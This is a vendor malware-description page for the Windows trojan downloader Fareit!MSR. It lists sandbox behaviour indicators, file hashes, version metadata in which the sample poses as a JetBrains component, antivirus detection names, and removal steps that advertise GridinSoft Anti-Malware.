Trojan

TrojanDownloader:Win32/Fareit!MSR (file analysis)

Malware Removal

The TrojanDownloader:Win32/Fareit!MSR is considered dangerous by lots of security experts. When this infection is active, you may notice unwanted processes in Task Manager list. In this case, it is adviced to scan your computer with GridinSoft Anti-Malware.

GridinSoft Anti-Malware

Gridinsoft Anti-Malware

Removing PC viruses manually may take hours and may damage your PC in the process. We recommend using GridinSoft Anti-Malware for virus removal. Allows to complete scan and cure your PC during the trial period.
DOWNLOAD NOW
6-day free trial available.

What TrojanDownloader:Win32/Fareit!MSR virus can do?

  • Behavioural detection: Executable code extraction – unpacking
  • A file was accessed within the Public folder.
  • CAPE extracted potentially suspicious content
  • Executed a very long command line or script command which may be indicative of chained commands or obfuscation
  • The binary likely contains encrypted or compressed data.
  • Authenticode signature is invalid
  • A scripting utility was executed
  • Uses Windows utilities for basic functionality
  • Appears to use command line obfuscation
  • A script or command line contains a long continuous string indicative of obfuscation
  • A powershell command using multiple variables was executed possibly indicative of obfuscation
  • Uses suspicious command line tools or Windows utilities
  • Yara rule detections observed from a process memory dump/dropped files/CAPE

How to determine TrojanDownloader:Win32/Fareit!MSR?



File Info:

name: E49AA5579268D0E34F5B.mlw
path: /opt/CAPEv2/storage/binaries/a20a9f118a35d08803b47309887fc02247ed5a7e368298185c77cd99e9376f29
crc32: 91E44F68
md5: e49aa5579268d0e34f5bd32cde18e262
sha1: 0f20591c8ebe521e3f2a79fed0405020e2c6c3b6
sha256: a20a9f118a35d08803b47309887fc02247ed5a7e368298185c77cd99e9376f29
sha512: ba10a2a3c9117ff5aa30ad16e8d43ce00231bba051ee937d97bbc6fc5b99aa6141c2a6195b1f526db1d28a5c715120f3c4c75ba3303e99f8c42c91cccf2ab420
ssdeep: 192:/T33YrFJvL2MCVpYp3ieu5virqsDKkaVp+:/T33YrXLnC/sSeu5Krqa1w
type: PE32 executable (GUI) Intel 80386, for MS Windows
tlsh: T195428D0D6AE146F7F0F86BB5152FCB704462AC72C776632916C10E077C6C2ABAC1AB55
sha3_384: 448e3179aa3502605d8f43286bbba235b9baa3c651d863a3b92bdb5468ec72c01c08f9e3952f867820cdf866510e153f
ep_bytes: b8d89c40005064ff3500000000648925
timestamp: 2022-05-07 00:00:45


Version Info:

CompanyName: JetBrains s.r.o
LegalCopyright: Copyright ©2011-2021 JetBrains s.r.o. All rights reserved.
FileDescription: JetBrains ETW Collector Host
FileVersion: 211.15.21.0
ProductName: JetBrains ETW Collector
ProductVersion: 211.15.21.0
Translation: 0x0000 0x04b0

TrojanDownloader:Win32/Fareit!MSR also known as:

BkavW32.AIDetectMalware
LionicTrojan.Win32.Doris.4!c
Elasticmalicious (high confidence)
MicroWorld-eScanGen:Variant.Ser.Tedy.1886
ClamAVWin.Downloader.Offer-9959756-0
FireEyeGen:Variant.Ser.Tedy.1886
McAfeeRDN/Generic.dx
Cylanceunsafe
ZillyaDownloader.Convagent.Win32.1359
SangforDownloader.Win32.Agent.Vdwe
AlibabaTrojan:Win32/Generic.e167bc6e
Cybereasonmalicious.79268d
BitDefenderThetaGen:NN.ZevbaF.36302.ai0faK2JhWk
CyrenW32/VBKrypt.BHE.gen!Eldorado
SymantecTrojan Horse
ESET-NOD32a variant of Generik.FNPLHYY
APEXMalicious
CynetMalicious (score: 100)
KasperskyTrojan-Downloader.Win32.Agent.xyahmt
BitDefenderGen:Variant.Ser.Tedy.1886
AvastWin32:Malware-gen
TencentWin32.Trojan-Downloader.Agent.Eflw
SophosMal/Generic-S (PUA)
DrWebTrojan.Siggen17.57353
VIPREGen:Variant.Ser.Tedy.1886
TrendMicroTROJ_FRS.0NA103HV22
McAfee-GW-EditionBehavesLike.Win32.MultiDropper.lm
Trapminemalicious.high.ml.score
EmsisoftGen:Variant.Ser.Tedy.1886 (B)
GDataGen:Variant.Ser.Tedy.1886
JiangminTrojanDownloader.Agent.gciq
WebrootW32.Malware.Gen
Antiy-AVLTrojan/Win32.VB.gic
ArcabitTrojan.Ser.Tedy.D75E
ViRobotTrojan.Win.Z.Agent.12288.PM
ZoneAlarmTrojan-Downloader.Win32.Agent.xyahmt
MicrosoftTrojanDownloader:Win32/Fareit!MSR
GoogleDetected
AhnLab-V3Malware/Win.Generic.C5143296
VBA32BScope.Trojan.VB.01559
ALYacTrojan.Downloader.Offer
MAXmalware (ai score=100)
MalwarebytesMalware.AI.821152956
PandaTrj/Chgt.AD
TrendMicro-HouseCallTROJ_FRS.0NA103HV22
RisingDownloader.Agent!8.B23 (CLOUD)
IkarusTrojan.Win32.VB
MaxSecureTrojan.Malware.879860.susgen
FortinetW32/PossibleThreat
AVGWin32:Malware-gen
DeepInstinctMALICIOUS
CrowdStrikewin/malicious_confidence_100% (W)

How to remove TrojanDownloader:Win32/Fareit!MSR?

TrojanDownloader:Win32/Fareit!MSR removal tool
  • Download and install GridinSoft Anti-Malware.
  • Open GridinSoft Anti-Malware and perform a “Standard scan“.
  • Move to quarantine” all items.
  • Open “Tools” tab – Press “Reset Browser Settings“.
  • Select proper browser and options – Click “Reset”.
  • Restart your computer.

You may also like

About the author

Paul Valéry

I'm a cyber security analyst and data science expert with 5+ years of experience with security software contractors.

View all posts

Leave a Comment